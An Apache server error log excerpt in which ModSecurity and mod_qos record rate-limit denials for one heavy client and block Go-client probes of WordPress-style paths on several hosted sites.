[Tue May 26 20:00:11.372064 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz86QAAADQ"]
[Tue May 26 20:00:11.375914 2026] [security2:error] [pid 106517:tid 106715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZqwAAAMU"]
[Tue May 26 20:00:11.379736 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9FQAAAEI"]
[Tue May 26 20:00:11.379949 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucWDRMqfxdEDkosz85wAAAHg"]
[Tue May 26 20:00:11.387907 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZsQAAAOg"]
[Tue May 26 20:00:11.397322 2026] [security2:error] [pid 106517:tid 106682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucYZZc2DoU1lPnP1ZqgAAAKQ"]
[Tue May 26 20:00:11.417221 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9GwAAAAU"]
[Tue May 26 20:00:11.428897 2026] [security2:error] [pid 106517:tid 106676] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z3AAAAJ8"]
[Tue May 26 20:00:11.437432 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9KQAAADA"]
[Tue May 26 20:00:11.441003 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z7AAAAM8"]
[Tue May 26 20:00:11.441744 2026] [security2:error] [pid 93576:tid 93730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9IAAAABI"]
[Tue May 26 20:00:11.443601 2026] [security2:error] [pid 106517:tid 106677] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z4wAAAKA"]
[Tue May 26 20:00:11.472527 2026] [security2:error] [pid 93576:tid 93761] [client 103.163.220.39:25905] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/so-pinyin-slugs/inc/main_json.php"] [unique_id "ahWuc2DRMqfxdEDkosz9ngAAADE"]
[Tue May 26 20:00:11.597227 2026] [qos:error] [pid 106517:tid 106721] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aVAAAAMs
[Tue May 26 20:00:11.597341 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9twAAAFY
[Tue May 26 20:00:11.597850 2026] [qos:error] [pid 106517:tid 106704] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aVQAAALo
[Tue May 26 20:00:11.597944 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9uAAAAHM
[Tue May 26 20:00:11.599274 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuc4ZZc2DoU1lPnP1aVgAAAJs
[Tue May 26 20:00:11.599766 2026] [qos:error] [pid 106517:tid 106654] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuc4ZZc2DoU1lPnP1aVwAAAIk
[Tue May 26 20:00:11.601945 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9ugAAAFA
[Tue May 26 20:00:11.603547 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuc4ZZc2DoU1lPnP1aWwAAAQM
[Tue May 26 20:00:11.605327 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9uwAAABk
[Tue May 26 20:00:11.605846 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuc4ZZc2DoU1lPnP1aXgAAAQM
[Tue May 26 20:00:11.750115 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1aawAAAJ8
[Tue May 26 20:00:11.750120 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:58064] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9vAAAAGI
[Tue May 26 20:00:11.751052 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9vQAAACY
[Tue May 26 20:00:11.752137 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9vgAAAAw
[Tue May 26 20:00:11.752505 2026] [qos:error] [pid 106517:tid 106689] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc4ZZc2DoU1lPnP1abAAAAKs
[Tue May 26 20:00:11.753900 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35370] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9vwAAADw
[Tue May 26 20:00:11.756607 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:35390] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9wAAAABI
[Tue May 26 20:00:11.757507 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9wgAAAGM
[Tue May 26 20:00:11.757987 2026] [qos:error] [pid 93576:tid 93722] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9wQAAAAo
[Tue May 26 20:00:11.758384 2026] [qos:error] [pid 93576:tid 93795] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuc2DRMqfxdEDkosz9wwAAAFM
[Tue May 26 20:00:11.969419 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.47:47305] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1acwAAAKA"]
[Tue May 26 20:00:12.277442 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9HwAAAEA"]
[Tue May 26 20:00:12.280005 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9MwAAAEk"]
[Tue May 26 20:00:12.285204 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z7gAAAMM"]
[Tue May 26 20:00:12.285938 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9NgAAACc"]
[Tue May 26 20:00:12.287819 2026] [security2:error] [pid 106517:tid 106694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z3QAAALA"]
[Tue May 26 20:00:12.289456 2026] [security2:error] [pid 93576:tid 93801] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9PwAAAFk"]
[Tue May 26 20:00:12.290444 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9HgAAAEY"]
[Tue May 26 20:00:12.295589 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z8AAAAME"]
[Tue May 26 20:00:12.296268 2026] [security2:error] [pid 93576:tid 93745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9NAAAACE"]
[Tue May 26 20:00:12.314602 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9QgAAAFg"]
[Tue May 26 20:00:12.326571 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z5QAAAKM"]
[Tue May 26 20:00:12.328149 2026] [security2:error] [pid 93576:tid 93786] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9PAAAAEo"]
[Tue May 26 20:00:12.330694 2026] [security2:error] [pid 106517:tid 106743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z9wAAAOE"]
[Tue May 26 20:00:12.340818 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z7wAAANs"]
[Tue May 26 20:00:12.351705 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9NQAAAEw"]
[Tue May 26 20:00:12.354712 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9PgAAAHo"]
[Tue May 26 20:00:12.362874 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9SQAAAFs"]
[Tue May 26 20:00:12.368244 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aLgAAAK8"]
[Tue May 26 20:00:12.371121 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z9gAAAOY"]
[Tue May 26 20:00:12.372143 2026] [security2:error] [pid 93576:tid 93822] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9kgAAAG4"]
[Tue May 26 20:00:12.387710 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aKAAAAJk"]
[Tue May 26 20:00:12.393824 2026] [security2:error] [pid 93576:tid 93781] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9lQAAAEU"]
[Tue May 26 20:00:12.400939 2026] [security2:error] [pid 93576:tid 93732] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucmDRMqfxdEDkosz9TAAAABQ"]
[Tue May 26 20:00:12.411840 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1aAQAAAPo"]
[Tue May 26 20:00:12.412729 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9iAAAABc"]
[Tue May 26 20:00:12.419349 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aOAAAALY"]
[Tue May 26 20:00:12.419945 2026] [security2:error] [pid 106517:tid 106745] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWucoZZc2DoU1lPnP1Z_AAAAOM"]
[Tue May 26 20:00:12.428182 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9ggAAAFI"]
[Tue May 26 20:00:12.429635 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9kAAAADk"]
[Tue May 26 20:00:12.436511 2026] [security2:error] [pid 106517:tid 106696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aPQAAALI"]
[Tue May 26 20:00:12.439846 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aQgAAAIU"]
[Tue May 26 20:00:12.482555 2026] [security2:error] [pid 93576:tid 93826] [client 103.163.220.21:28249] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/"] [unique_id "ahWudGDRMqfxdEDkosz93QAAAHI"]
[Tue May 26 20:00:12.541633 2026] [security2:error] [pid 106517:tid 106684] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWudIZZc2DoU1lPnP1adQAAAKY"]
[Tue May 26 20:00:12.979044 2026] [security2:error] [pid 93576:tid 93821] [client 103.163.220.23:29627] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/x.php"] [unique_id "ahWudGDRMqfxdEDkosz96QAAAG0"]
[Tue May 26 20:00:13.135849 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudWDRMqfxdEDkosz-IwAAACo
[Tue May 26 20:00:13.136713 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-JQAAAHE
[Tue May 26 20:00:13.138870 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudWDRMqfxdEDkosz-KQAAACQ
[Tue May 26 20:00:13.139087 2026] [qos:error] [pid 106517:tid 106722] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudYZZc2DoU1lPnP1axAAAAMw
[Tue May 26 20:00:13.140116 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudWDRMqfxdEDkosz-JgAAAC0
[Tue May 26 20:00:13.142764 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudYZZc2DoU1lPnP1ayAAAANY
[Tue May 26 20:00:13.143924 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-KwAAAC8
[Tue May 26 20:00:13.143985 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:57898] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWudYZZc2DoU1lPnP1aygAAAK4
[Tue May 26 20:00:13.147612 2026] [qos:error] [pid 106517:tid 106684] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudYZZc2DoU1lPnP1azAAAAKY
[Tue May 26 20:00:13.276892 2026] [security2:error] [pid 106517:tid 106740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aMAAAAN4"]
[Tue May 26 20:00:13.286385 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aOQAAAPk"]
[Tue May 26 20:00:13.290608 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aMQAAAPY"]
[Tue May 26 20:00:13.300473 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-MgAAAHE
[Tue May 26 20:00:13.300522 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:57874] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-MwAAAHc
[Tue May 26 20:00:13.300762 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudWDRMqfxdEDkosz-NAAAAEo
